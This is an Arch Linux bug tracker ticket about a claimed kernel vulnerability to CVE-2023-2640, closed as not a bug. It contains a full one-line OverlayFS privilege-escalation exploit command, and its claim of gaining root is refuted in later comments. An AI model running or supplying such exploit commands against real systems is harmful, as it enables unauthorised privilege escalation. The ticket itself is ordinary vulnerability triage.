Arch Linux

Please read this before reporting a bug:
https://wiki.archlinux.org/title/Bug_reporting_guidelines

Do NOT report bugs when a package is just outdated, or it is in the AUR. Use the 'flag out of date' link on the package page, or the Mailing List.

REPEAT: Do NOT report bugs for outdated packages!
Tasklist

FS#79241 - *not* Vulnerable to CVE-2023-2640

Attached to Project: Arch Linux
Opened by Martijn Smits (Martmists) - Saturday, 29 July 2023, 10:06 GMT
Last edited by Toolybird (Toolybird) - Sunday, 30 July 2023, 22:07 GMT
Task Type Bug Report
Category Packages: Core
Status Closed
Assigned To Tobias Powalowski (tpowa)
Jan Alexander Steffens (heftig)
David Runge (dvzrv)
Levente Polyak (anthraxx)
Architecture x86_64
Severity Low
Priority High
Reported Version
Due in Version Undecided
Due Date Undecided
Percent Complete 100%
Votes 0
Private No

Details

Description: The kernel seems to be vulnerable to CVE-2023-2640


Additional info:
* package version(s): 6.4.7.arch1-1
* config and/or log files etc. N/A
* link to upstream bug report, if any
- https://nvd.nist.gov/vuln/detail/CVE-2023-2640
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2640

Steps to reproduce:

1. Open a terminal or tty as unprivileged user
2. Run the following command:

unshare -rm bash -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/* && u/python3 -c 'import os;os.setuid(0);os.system(\"bash\")'"

3. You now have a bash session with uid and gid 0.
This task depends upon

Closed by  Toolybird (Toolybird)
Sunday, 30 July 2023, 22:07 GMT
Reason for closing:  Not a bug
Additional comments about closing:  See comments
Comment by Robin Candau (Antiz) - Saturday, 29 July 2023, 10:21 GMT
I can confirm, was able to reproduce on my side.

EDIT: I haven't paid attention that the root shell is only opened within the user namespace. I removed my vote, ignore my confirmation.
Comment by Marco (jellybean) - Saturday, 29 July 2023, 12:27 GMT
> You now have

No, I don't

1 ss@archlinux ~ % ps aux | grep \[b]ash
ss 1805 0.0 0.1 7640 4096 pts/0 S 12:24 0:00 bash -c mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/* && u/python3 -c 'import os;os.setuid(0);os.system("bash")'
ss 1811 0.0 0.2 15308 8320 pts/0 S 12:24 0:00 u/python3 -c import os;os.setuid(0);os.system("bash")
ss 1813 0.0 0.1 7772 4480 pts/0 S 12:24 0:00 bash
ss 1833 0.0 0.1 7640 4096 pts/0 S 12:24 0:00 bash -c mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/* && u/python3 -c 'import os;os.setuid(0);os.system("bash")'
ss 1839 0.0 0.2 15308 8576 pts/0 S 12:24 0:00 u/python3 -c import os;os.setuid(0);os.system("bash")
ss 1840 0.0 0.1 7772 4608 pts/0 S+ 12:24 0:00 bash
Comment by loqs (loqs) - Saturday, 29 July 2023, 12:29 GMT
This was supposed to only affect kernels with a Ubuntu specific patch [1]. Can you reproduce the steps from [2] and gain privileges outside the namesapce?
If so has upstream been contacted that the assessment that is Ubuntu only is incorrect? Has the commit in mainline that introduces the issue been identified?

[1] https://lore.kernel.org/all/CAODzB9p4_fh21bZoSMyMiF2QKDqE09kZ0b7mHR99LEw0mCF=ww%40mail.gmail.com/
[2] https://www.wiz.io/blog/ubuntu-overlayfs-vulnerability#vulnerability-1-cve-2023-2640-ovl_copy_xattr-35
Comment by Jan Alexander Steffens (heftig) - Saturday, 29 July 2023, 21:10 GMT
Your command only gets you a "root" shell inside the user namespace, which you already had just running `unshare -rm bash`.

Loading...